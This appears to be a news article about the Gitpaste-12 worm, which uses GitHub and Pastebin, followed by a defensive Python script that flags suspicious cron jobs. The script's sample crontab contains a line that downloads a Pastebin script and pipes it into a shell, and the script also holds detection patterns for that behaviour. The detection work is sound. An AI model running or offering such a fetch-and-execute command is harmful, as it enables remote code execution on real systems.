Gitpaste-12 malware is targeting you through GitHub
- Linux-based x86 servers and Linux ARM/MIPS-based IoT devices may become Gitpaste-12 targets.
- Gitpaste-12 is a new worm that uses GitHub and Pastebin. Take a look below to find more about it.
Gitpaste-12 is a recently discovered worm that hosts its component code on GitHub and Pastebin and exploits over 12 vulnerabilities.
The name Gitpaste-12 comes from its use of GitHub and Pastebin and from its at least 12 different attack modules.
At the moment, targets include Linux-based x86 servers, along with Linux ARM- and MIPS-based IoT devices.
The first Gitpaste-12 attacks were detected by Juniper Threat Labs. The report released by Juniper Threat Labs reveals:
The first phase of the attack is the initial system compromise. (…) This worm has 12 known attack modules and more under development.
How does Gitpaste-12 spread?
After this initial phase, the worm seems to have a precise mission: it identifies known exploits and may attempt to brute force passwords.
When a system is compromised, Gitpaste-12 sets up a cron job it downloads from Pastebin, which executes the same script again each minute.
This efficient mechanism is most likely used to push cron job updates to the botnet. As already confirmed, the Gitpaste-12 malware also contains a script that launches attacks against other machines.
This is how the worm tries to replicate: it starts with a random /8 CIDR block and attacks all addresses within that range.
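The cron persistence described above suggests a simple host check. The following is an added example, not code from Juniper's report or from the malware: it flags crontab entries that run every minute and fetch content from GitHub or Pastebin or pipe a download into a shell. The function names, the heuristics and the sample crontab (with a placeholder URL) are assumptions made for illustration, not published indicators.

```python
import re

# Hosts named in the article (GitHub and Pastebin); extend for your environment.
HOSTING = re.compile(r"(?:pastebin\.com|github\.com|githubusercontent\.com)", re.I)
FETCH = re.compile(r"\b(?:curl|wget)\b", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")
EVERY_MINUTE = {"*", "*/1"}

SAMPLE_CRONTAB = """\
# constructed sample, not taken from a real infection
MAILTO=root
*/5 * * * * /usr/local/bin/backup.sh
* * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE | sh
0 3 * * * wget -q https://github.com/example/tool/releases/latest -O /tmp/tool
* * * * * /usr/bin/flock -n /tmp/job.lock /opt/app/heartbeat
"""


def parse_entry(line):
    """Split a crontab line into (five schedule fields, rest), else None."""
    line = line.strip()
    # Skip blanks, comments, @reboot-style shortcuts and VAR=value settings.
    if not line or line[0] in "#@" or re.match(r"\w+\s*=", line):
        return None
    parts = line.split(None, 5)
    # In /etc/crontab the rest starts with a user name; the searches still work.
    return (parts[:5], parts[5]) if len(parts) == 6 else None


def suspicious_cron_entries(text):
    """Return (line_number, reasons) for every-minute jobs that pull remote code."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        entry = parse_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        if not all(field in EVERY_MINUTE for field in schedule):
            continue
        reasons = []
        if FETCH.search(command) and HOSTING.search(command):
            reasons.append("fetches from GitHub/Pastebin")
        if FETCH.search(command) and PIPE_TO_SHELL.search(command):
            reasons.append("pipes a download into a shell")
        if reasons:
            findings.append((number, reasons))
    return findings

if __name__ == "__main__":
    print(suspicious_cron_entries(SAMPLE_CRONTAB))
```

Feed it the output of `crontab -l` for each user and the contents of `/etc/crontab` and `/etc/cron.d/`; a hit is a prompt for manual review, not proof of infection.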
Knowing the Gitpaste-12 location and the fact that it can spread that easily, are you about to keep on using GitHub? Let us know your thoughts on this in the comments area below.
Have we seen this worm compromise Windows machines? How would I know if it’s on my machine?
Thanks!